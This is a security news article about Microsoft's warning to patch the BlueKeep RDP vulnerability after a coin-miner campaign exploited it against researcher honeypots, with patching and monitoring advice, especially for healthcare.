– Organizations are once again being warned to patch the BlueKeep remote desktop protocol (RDP) flaw reported by Microsoft in May 2019, after hackers were spotted targeting the vulnerability to launch cryptocurrency attacks. The tech giant warns that these early attacks are just a sign of what’s to come.
In mid-May, Microsoft issued a rare patch for a handful of legacy operating systems that are no longer serviced by the company. If exploited, the RDP vulnerability would allow a hacker to remotely execute RDP without authorization to send tailored requests – including malware.
Bearing hallmarks of the flaw that allowed for the notorious WannaCry attack in May 2017, the hope was that organizations would patch the vulnerability to prevent another global cyberattack.
However, despite an alert from the National Security Agency, security researchers demonstrating the severity of the flaw, and a repeat warning from Microsoft, 800,000 devices were still unpatched as of July 2019.
Microsoft’s latest warning follows reports that security researchers discovered the first malware campaign weaponizing the BlueKeep flaw. Most researchers did not believe the attacks were severe, especially given the urgency of the repeat warnings that the flaw could cause another WannaCry-like event.
According to Microsoft, hackers targeted the honeypot of security researcher Kevin Beaumont, which caused them to crash. The tech giant worked with Beaumont and another researcher, Marcus Hutchins, to investigate and analyze the event.
The team extracted indicators of compromise and other signal intelligence and found an earlier coin-mining campaign occurred in September that “used a main implant that contacted the same command-and-control infrastructure used during the October BlueKeep Metasploit campaign, which, in cases where the exploit did not cause the system to crash, was also observed installing a coin miner.”
It’s also likely those attacks were launched by the same actors, as the latest BlueKeep campaign used the same exploit module. Attackers exploited the RDP flaw to download and execute obfuscated PowerShell scripts, which installed the coin miner as the final payload and scheduled persistence task.
The researchers determined these attacks are just the beginning: the attackers will refine their techniques to launch more successful attacks. Further, organizations and other users should not delay in patching the vulnerability.
“Security signals and forensic analysis show that the BlueKeep Metasploit module caused crashes in some cases, but we cannot discount enhancements that will likely result in more effective attacks,” Microsoft researchers wrote.
“While there have been no other verified attacks involving ransomware or other types of malware as of this writing, the BlueKeep exploit will likely be used to deliver payloads more impactful and damaging than coin miners,” they added.
As long as organizations fail to patch the vulnerability, Microsoft warned the BlueKeep flaw will continue to be a threat. Organizations also need to ensure they have best practice credential hygiene and overall sound security posture, as well as employing behavior-based antivirus and endpoint detection and response detections.
What’s more, many of the unpatched devices may also be found, unmonitored by third-party vendors and others along the supply chain – a major weakness of the healthcare sector. Microsoft also provided a threat analytics report to support security operations team conduct investigations into the BlueKeep flaw, along with advanced hunting queries.
“Because BlueKeep can be exploited without leaving obvious traces, customers should also thoroughly inspect systems that might already be infected or compromised,” Microsoft wrote.